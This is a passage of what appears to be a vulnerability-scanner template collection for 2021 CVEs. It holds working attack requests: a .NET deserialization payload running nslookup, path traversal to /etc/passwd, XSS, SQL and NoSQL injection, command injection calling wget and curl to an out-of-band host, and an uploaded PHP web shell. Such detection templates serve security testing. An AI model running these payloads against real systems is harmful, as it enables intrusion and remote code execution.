z:FactoryType=\"b:MemberInfoSerializationHolder\" z:Type=\"System.Reflection.MemberInfoSerializationHolder\" z:Assembly=\"0\"\n                            xmlns=\"\"\n                            xmlns:b=\"http://schemas.datacontract.org/2004/07/System.Reflection\">\n                            <Name z:Ref=\"8\" i:nil=\"true\"/>\n                            <AssemblyName z:Ref=\"6\" i:nil=\"true\"/>\n                            <ClassName z:Ref=\"9\" i:nil=\"true\"/>\n                            <Signature z:Id=\"20\" z:Type=\"System.String\" z:Assembly=\"0\">Int32 Compare(System.String, System.String)</Signature>\n                            <Signature2 z:Id=\"21\" z:Type=\"System.String\" z:Assembly=\"0\">System.Int32 Compare(System.String, System.String)</Signature2>\n                            <MemberType z:Id=\"22\" z:Type=\"System.Int32\" z:Assembly=\"0\">8</MemberType>\n                            <GenericArguments i:nil=\"true\"/>\n                        </method1>\n                    </_comparison>\n                </Comparer>\n                <Version z:Id=\"23\" z:Type=\"System.Int32\" z:Assembly=\"0\"\n                    xmlns=\"\">2</Version>\n                <Items z:Id=\"24\" z:Type=\"System.String[]\" z:Assembly=\"0\" z:Size=\"2\"\n                    xmlns=\"\">\n                    <string z:Id=\"25\"\n                        xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\">/c nslookup {{interactsh-url}}</string>\n                    <string z:Id=\"26\"\n                        xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\">cmd</string>\n                </Items>\n            </ArrayOfstring>\n        </parameter>\n    </parameters>\n</a>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["System.ArgumentNullException"]}]}]},{"id":"CVE-2021-40856","info":{"name":"Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /about/../tree?action=get HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"TYPE\"","\"ITEMS\"","\"COUNT\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24947","info":{"name":"WordPress Responsive Vector Maps < 6.4.2 - Arbitrary File Read","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34643","info":{"name":"WordPress Skaut Bazar <1.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php/</script><script>alert(document.domain)</script>/?page=skatubazar_option HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24495","info":{"name":"Wordpress Marmoset Viewer <1.9.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%27{{randstr}}%27)>","{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><svg/onload=alert('{{randstr}}')>","alert(/{{randstr}}/)"],"condition":"or"},{"type":"word","words":["Marmoset Viewer"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20031","info":{"name":"SonicWall SonicOS 7.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{randstr}}.tld\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["https://{{randstr}}.tld/auth.html","Please be patient as you are being re-directed"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41432","info":{"name":"FlatPress 1.2.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykGJmx9vKsePrMkVp\n\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"user\"\n\n{{username}}\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"pass\"\n\n{{password}}\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"submit\"\n\nLogin\n------WebKitFormBoundarykGJmx9vKsePrMkVp--\n","GET /admin.php?p=entry&action=write HTTP/1.1\nHost: {{Hostname}}\n","POST /admin.php?p=entry&action=write HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=abcd&timestamp=&entry=&attachselect=--&imageselect=--&content=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&save=Publish\n","GET /index.php/2022/10 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_4, '<p><script>alert(document.cookie)</script></p>')","contains(body_4, 'FlatPress')","contains(header_4, 'text/html')","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-34473","info":{"name":"Exchange Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com","{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com"],"matchers":[{"type":"word","part":"body","words":["Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException","Exchange MAPI/HTTP Connectivity Endpoint"],"condition":"or"}]}]},{"id":"CVE-2021-23241","info":{"name":"MERCUSYS Mercury X18G 1.0.5 Router - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loginLess/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33544","info":{"name":"Geutebruck - Remote Command Injection","severity":"high"},"requests":[{"raw":["GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-40859","info":{"name":"Auerswald COMpact 5500R 7.8A and 8.0B Devices Backdoor","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/about_state"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"pbx\"","\"dongleStatus\":0","\"macaddr\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3002","info":{"name":"Seo Panel 4.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /seo/seopanel/login.php?sec=forgot HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>","seopanel"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24145","info":{"name":"WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: multipart/form-data; boundary=---------------------------132370916641787807752589698875\n\n-----------------------------132370916641787807752589698875\nContent-Disposition: form-data; name=\"feed\"; filename=\"{{randstr}}.php\"\nContent-Type: text/csv\n\n<?php echo 'CVE-2021-24145'; ?>\n\n-----------------------------132370916641787807752589698875\nContent-Disposition: form-data; name=\"mec-ix-action\"\n\nimport-start-bookings\n-----------------------------132370916641787807752589698875--\n","GET /wp-content/uploads/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, 'CVE-2021-24145')"],"condition":"and"}]}]},{"id":"CVE-2021-40970","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[username]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45092","info":{"name":"Thinfinity Iframe Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/lab.html?vpath=//interact.sh"],"matchers":[{"type":"regex","regex":[".*vpath.*","thinfinity"],"condition":"and"}]}]},{"id":"CVE-2021-36873","info":{"name":"WordPress iQ Block Country <=1.2.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=iqblockcountry-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Diq-block-country%2Flibs%2Fblockcountry-settings.php&blockcountry_blockmessage=test</textarea><script>alert(document.domain)</script>&blockcountry_redirect=2&blockcountry_redirect_url=&blockcountry_header=on&blockcountry_nrstatistics=15&blockcountry_daysstatistics=30&blockcountry_geoapikey=&blockcountry_apikey=&blockcountry_ipoverride=NONE&blockcountry_debuglogging=on\n","GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, 'blockcountry_blockmessage\\\">test</textarea><script>alert(document.domain)</script>')","contains(body_4, '<h3>Block type</h3>')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2021-24298","info":{"name":"WordPress Simple Giveaways <2.36.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22911","info":{"name":"Rocket.Chat <=3.13 - NoSQL Injection","severity":"critical"},"requests":[{"raw":["POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"message\": \"{\\\"msg\\\":\\\"method\\\", \\\"method\\\": \\\"getPasswordPolicy\\\", \\\"params\\\": [{\\\"token\\\": {\\\"$regex\\\": \\\"^{{randstr}}\\\"}}] }\"}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[error-invalid-user]","\"success\":true"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31249","info":{"name":"CHIYU TCP/IP Converter - Carriage Return Line Feed Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: setting.htm","<script>alert(document.domain)</script>"],"condition":"and"},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-40960","info":{"name":"Galera WebTemplate 1.0 Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40661","info":{"name":"IND780 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ExePath=\\Windows","WorkDir=\\Windows"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27310","info":{"name":"Clansphere CMS 2011.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26086","info":{"name":"Atlassian Jira Limited -  Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30134","info":{"name":"Php-mod/curl Library <2.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php?key=<img%20src%20onerror%3dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["key\":\"<img src onerror=alert(document.domain)>\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27358","info":{"name":"Grafana Unauthenticated Snapshot Creation","severity":"high"},"requests":[{"raw":["POST /api/snapshots HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"dashboard\": {\"editable\":false,\"hideControls\":true,\"nav\":[{\"enable\":false,\"type\":\"timepicker\"}],\"rows\": [{}],\"style\":\"dark\",\"tags\":[],\"templating\":{\"list\":[]},\"time\":{},\"timezone\":\"browser\",\"title\":\"Home\",\"version\":5},\"expires\": 3600}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"deleteUrl\":","\"deleteKey\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2021-44138","info":{"name":"Caucho Resin >=4.0.52 <=4.0.56 - Directory traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/;/WEB-INF/web.xml","{{BaseURL}}/resin-doc/;/WEB-INF/resin-web.xml"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","application/xml"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46417","info":{"name":"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password="],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-39165","info":{"name":"Cachet <=2.3.18 - SQL Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))--"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"pagination\") && contains(body, \"data\")"],"condition":"and"}]}]},{"id":"CVE-2021-45967","info":{"name":"Pascom CPS Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40542","info":{"name":"Opensis-Classic 8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24488","info":{"name":"WordPress Post Grid <2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=\"onmouseover=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\\\"onmouseover=alert(document.domain)/\">","Post Grid"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24316","info":{"name":"WordPress Mediumish Theme <=1.0.47 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(/{{randstr}}/)</script>","Sorry, no posts matched your criteria."],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24987","info":{"name":"WordPress Super Socializer <7.13.30 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]=<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"facebook_urls\":[[\"<img src=x onerror=alert(document.domain)>\"]]"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36580","info":{"name":"IceWarp Mail Server - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/basic/?referer=https://interact.sh&_c=auth&ctz=120&signup_password=&_a%5bsignup%5d=1"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-24409","info":{"name":"Prismatic < 2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=prismatic&tab=%22+style%3Danimation-name%3Arotation+onanimationend%3Dalert(document.domain)%2F%2F%22 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"Leave A Review?\")","contains(body_2, \"onanimationend=alert(document.domain)\")"],"condition":"and"}]}]},{"id":"CVE-2021-27561","info":{"name":"YeaLink DM 3.6.0.20 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid","gid","groups"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-39152","info":{"name":"XStream <1.4.18 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.runtime.Source_-URLData>\n      <url>http://{{interactsh-url}}/internal/</url>\n      <cs>GBK</cs>\n      <hash>1111</hash>\n      <array>b</array>\n      <length>0</length>\n      <lastModified>0</lastModified>\n    </jdk.nashorn.internal.runtime.Source_-URLData>\n    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>\n  </entry>\n  <entry>\n    <jdk.nashorn.internal.runtime.Source_-URLData>\n      <url>http://{{interactsh-url}}/internal/</url>\n      <cs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/>\n      <hash>1111</hash>\n      <array>b</array>\n      <length>0</length>\n      <lastModified>0</lastModified>\n    </jdk.nashorn.internal.runtime.Source_-URLData>\n    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"]}]}]},{"id":"CVE-2021-25033","info":{"name":"Noptin < 1.6.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-45422","info":{"name":"Reprise License Manager 14.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goform/activate_process?isv=&akey=&hostid=&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>\"><input type=","value: \"><script>alert(document.domain)</script>)<br>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31589","info":{"name":"BeyondTrust Secure Remote Access Base <=6.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","bomgar"],"case-insensitive":true,"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37538","info":{"name":"PrestaShop SmartBlog <4.0.6- SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c5fe25896e49ddfe996db7508cf00534"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36356","info":{"name":"Kramer VIAware - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nradioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php\n","GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute(\"curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'\")}' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-41266","info":{"name":"MinIO Operator Console Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /api/v1/login/oauth2/auth HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"code\":\"test\",\"state\":\"test\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sessionId"]},{"type":"word","part":"header","words":["token"]},{"type":"status","status":[201,200],"condition":"or"}]}]},{"id":"CVE-2021-33851","info":{"name":"WordPress Customize Login Image <3.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=<script>alert(document.domain)</script>&cli_logo_file=&cli_login_background_color=&cli_custom_css=\n","GET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(header_4, \"text/html\")","contains(body_4, \"Go to <script>alert(document.domain)</script>\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-40875","info":{"name":"Gurock TestRail Application files.md5 Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/files.md5","{{BaseURL}}/testrail/files.md5"],"stop-at-first-match":true,"max-size":1000,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["app/arguments/admin"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27909","info":{"name":"Mautic <3.3.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/passwordreset?bundle=';alert(document.domain);var+ok='"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'';alert(document.domain);var ok='","mauticBasePath"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44077","info":{"name":"Zoho ManageEngine ServiceDesk Plus - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/RestAPI/ImportTechnicians"],"matchers-condition":"and","matchers":[{"type":"word","words":["<form name=\"ImportTechnicians\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37216","info":{"name":"QSAN Storage Manager <3.3.3 - Cross-Site 